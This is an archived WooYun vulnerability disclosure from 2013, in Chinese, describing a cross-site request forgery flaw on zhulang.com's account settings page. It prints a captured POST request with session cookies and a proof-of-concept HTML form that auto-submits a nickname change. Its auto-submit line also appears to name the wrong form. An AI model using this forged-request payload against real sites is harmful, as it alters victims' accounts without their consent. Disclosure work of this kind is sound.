乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-09-17: 细节已通知厂商并且等待厂商处理中 2013-09-22: 厂商已经主动忽略漏洞,细节向公众公开
http://www.zhulang.com/w_user_account.php在这里,看图吧。- -、。
POST /w_user_account.php HTTP/1.1Host: www.zhulang.comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv:23.0) Gecko/20100101 Firefox/23.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://www.zhulang.com/w_user_account.phpCookie: Hm_lvt_c4d45d45e1a473a3e43c8699766169ee=1379411573; Hm_lpvt_c4d45d45e1a473a3e43c8699766169ee=1379412666; bdshare_firstime=1379411573523; PHPSESSID=154a3b6ce4053e9b805f67f86c8464df; user_name201007=189837992; user_name201306=189837992; user_nick_name201306=189837992; user_name201007_1=10800; user_name201007_2=%7B%24user_name%7D%3A%3A189837992%7C%7C%7B%24user_nick_name%7D%3A%3A189837992%7C%7C%7B%24usertypename%7D%3A%3A%E6%99%AE%E9%80%9A%E4%BC%9A%E5%91%98%7C%7C%7B%24msgNoReadNumHc%7D%3A%3AConnection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 157action=register&nickName=%E6%B5%8B%E8%AF%95&signature=&userPasswordOld=&userPassword=&userRepassword=&button=%C2%A0%C2%A0%E6%8F%90%C2%A0%E4%BA%A4%C2%A0%C2%A0
构造poc:
<html><body><form id="wooyun" name="wooyun" action="http://www.zhulang.com/w_user_account.php" method="POST"><input type="text" name="action" value="register" /><input type="text" name="nickName" value="hack~" /><input type="text" name="signature" value="" /><input type="text" name="userPasswordOld" value="" /><input type="text" name="userPassword" value="" /><input type="text" name="userRepassword" value="" /><input type="text" name="button" value="%C2%A0%C2%A0%E6%8F%90%C2%A0%E4%BA%A4%C2%A0%C2%A0" /><input type="submit" value="submit"></form><script> document.long.submit();</script></body></html>
有礼物没? 有我就继续啦- -
危害等级:无影响厂商忽略
忽略时间:2013-09-22 18:33
暂无